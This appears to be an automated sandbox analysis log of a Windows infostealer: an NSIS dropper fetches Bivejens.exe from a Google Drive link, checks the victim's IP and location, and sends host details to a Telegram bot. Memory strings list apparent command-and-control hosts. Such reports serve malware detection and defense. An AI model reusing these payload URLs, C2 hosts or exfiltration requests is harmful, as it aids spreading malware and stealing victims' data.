        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49931 -> 104.21.80.1:443
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1UN1dFFFUX0eH6-2VwDQKvK9NPgweIY5V HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1UN1dFFFUX0eH6-2VwDQKvK9NPgweIY5V&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49925 version: TLS 1.0
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1UN1dFFFUX0eH6-2VwDQKvK9NPgweIY5V HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1UN1dFFFUX0eH6-2VwDQKvK9NPgweIY5V&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2011/01/2025%20/%2006:06:33%0D%0ACountry%20Name:%20United%20States%0D%0A[%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: drive.google.com
        Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
        Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
        Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
        Source: global trafficDNS traffic detected: DNS query: api.telegram.org
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 23:41:30 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
        Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
        Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
        Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
        Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
        Source: TjoY7n65om.exe, Bivejens.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
        Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
        Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
        Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20a
        Source: Bivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E87F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
        Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en(lm
        Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E87A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
        Source: Bivejens.exe, 00000005.00000002.2597746067.0000000002638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: Bivejens.exe, 00000005.00000002.2597746067.0000000002638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/k
        Source: Bivejens.exe, 00000005.00000002.2598208321.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000002.2597746067.0000000002672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1UN1dFFFUX0eH6-2VwDQKvK9NPgweIY5V
        Source: Bivejens.exe, 00000005.00000002.2597746067.0000000002672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1UN1dFFFUX0eH6-2VwDQKvK9NPgweIY5V4
        Source: Bivejens.exe, 00000005.00000002.2597746067.000000000268E000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1695795682.00000000026A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
        Source: Bivejens.exe, 00000005.00000003.1695795682.00000000026A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/downloa
        Source: Bivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000002.2597746067.000000000268E000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1695795682.00000000026A3000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1UN1dFFFUX0eH6-2VwDQKvK9NPgweIY5V&export=download
        Source: Bivejens.exe, 00000005.00000003.1695795682.00000000026A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1UN1dFFFUX0eH6-2VwDQKvK9NPgweIY5V&export=download)
        Source: Bivejens.exe, 00000005.00000002.2597746067.000000000268E000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1695795682.00000000026A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/p
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E70D000.00000004.00000800.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000002.2610716890.000000001E77D000.00000004.00000800.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
        Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E70D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
        Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
        Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E738000.00000004.00000800.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000002.2610716890.000000001E77D000.00000004.00000800.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
        Source: Bivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: Bivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
        Source: Bivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: Bivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
        Source: Bivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: Bivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: Bivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: Bivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E8B0000.00000004.00000800.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000002.2610716890.000000001E8A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
        Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E8A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/(lm
        Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E8AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
        Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
        Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
        Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
        Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
        Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.10:49883 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.10:49890 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49987 version: TLS 1.2
        Source: C:\Users\user\Desktop\TjoY7n65om.exeCode function: 0_2_0040542B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040542B

        System Summary

        barindex
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Bivejens.exeJump to dropped file
        Source: C:\Users\user\Desktop\TjoY7n65om.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_00403359 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,LdrInitializeThunk,CharNextW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,LdrInitializeThunk,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,LdrInitializeThunk,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,ExitWindowsEx,LdrInitializeThunk,ExitProcess,5_2_00403359
        Source: C:\Users\user\Desktop\TjoY7n65om.exeCode function: 0_2_00404C680_2_00404C68
        Source: C:\Users\user\Desktop\TjoY7n65om.exeCode function: 0_2_0040698E0_2_0040698E
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_00404C685_2_00404C68
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_0040698E5_2_0040698E
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_0015C19B5_2_0015C19B
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_0015D2785_2_0015D278
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_001553705_2_00155370
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_0015C4745_2_0015C474
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_0015C7385_2_0015C738
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_0015E9885_2_0015E988
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_001569E05_2_001569E0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_001529EC5_2_001529EC
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_0015CA085_2_0015CA08
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_0015CCD85_2_0015CCD8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_00159E835_2_00159E83
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_0015CFAC5_2_0015CFAC
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_00156FC85_2_00156FC8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_0015E97C5_2_0015E97C
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_210995485_2_21099548
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_210929685_2_21092968
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_210950285_2_21095028
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109FC685_2_2109FC68
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21099C705_2_21099C70
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109CCA05_2_2109CCA0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21090B305_2_21090B30
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_210917A05_2_210917A0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21091E805_2_21091E80
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109D5405_2_2109D540
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109295A5_2_2109295A
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109D5505_2_2109D550
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109D9A85_2_2109D9A8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109D9A55_2_2109D9A5
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109D9A75_2_2109D9A7
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109DDF15_2_2109DDF1
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109F8055_2_2109F805
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_210950185_2_21095018
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109F8105_2_2109F810
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_210900125_2_21090012
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_210900405_2_21090040
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21099C5F5_2_21099C5F
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109D0E95_2_2109D0E9
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109D0F85_2_2109D0F8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109EB085_2_2109EB08
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21090B205_2_21090B20
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109EF515_2_2109EF51
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109EF605_2_2109EF60
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109178F5_2_2109178F
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21098B915_2_21098B91
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109F3A85_2_2109F3A8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21098BA05_2_21098BA0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109F3B85_2_2109F3B8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109DE005_2_2109DE00
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109E24D5_2_2109E24D
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109E2585_2_2109E258
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21091E705_2_21091E70
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109E6A05_2_2109E6A0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109E6B05_2_2109E6B0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2109EAF85_2_2109EAF8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219181D05_2_219181D0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219108F05_2_219108F0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21918FB05_2_21918FB0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21917B785_2_21917B78
